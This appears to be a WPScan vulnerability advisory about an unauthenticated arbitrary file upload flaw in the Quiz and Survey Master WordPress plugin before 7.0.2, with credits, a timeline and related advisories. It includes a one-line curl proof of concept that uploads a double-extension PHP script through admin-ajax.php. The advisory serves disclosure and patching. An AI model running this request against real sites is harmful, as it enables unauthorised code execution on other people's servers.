Quiz and Survey Master < 7.0.2 – Unauthenticated Arbitrary File Upload

Description

Because the plugin doesn't validate the name of the uploaded file, an unauthenticated user could upload a PHP script with a double extension, e.g., script.php.jpg, and execute it on HTTP servers running a configuration such as Apache + PHP FastCGI.

Edit (WPScanTeam): This appears to be due to an incomplete fix of https://wpvulndb.com/vulnerabilities/10349

Proof of Concept

$ curl 'http://example.com/wp-admin/admin-ajax.php' -F 'action=qsm_upload_image_fd_question' -F 'question_id={some-id}' -F 'file=@script.php.jpg'

Affects Plugins

quiz-master-next

Fixed in 7.0.2

References

URL

https://plugins.trac.wordpress.org/changeset/2363719/quiz-master-next/trunk/php/classes/class-qmn-quiz-manager.php?old=2353115&old_path=quiz-master-next%2Ftrunk%2Fphp%2Fclasses%2Fclass-qmn-quiz-manager.php

Miscellaneous

Original Researcher

NinTechNet

Submitter

Wiyada Sinsad

Submitter website

https://nintechnet.com/

Verified

WPVDB ID

212712b5-c3be-47d1-b1d4-f98585e6f472

Timeline

Publicly Published

2020-08-29 (about 5 years ago)

Added

2020-08-29 (about 5 years ago)

Last Updated

2020-08-29 (about 5 years ago)

Other

Published

Title

Published

2014-08-01

Title

EditorMonkey - (FCKeditor) Arbitrary File Upload

Published

2016-02-08

Title

WP User Frontend <= 2.3.10 - Unrestricted File Upload

Published

2021-06-24

Title

ZoomSounds < 6.05 - Unauthenticated Arbitrary File Upload

Published

2025-08-27

Title

WP ULike Pro < 1.9.4 - Unauthenticated Limited Arbitrary File Upload

Published

2025-06-10

Title

WordPress Automatic Plugin - AI content generator and auto poster plugin < 3.116.0 - Authenticated (Author+) Arbitrary File Upload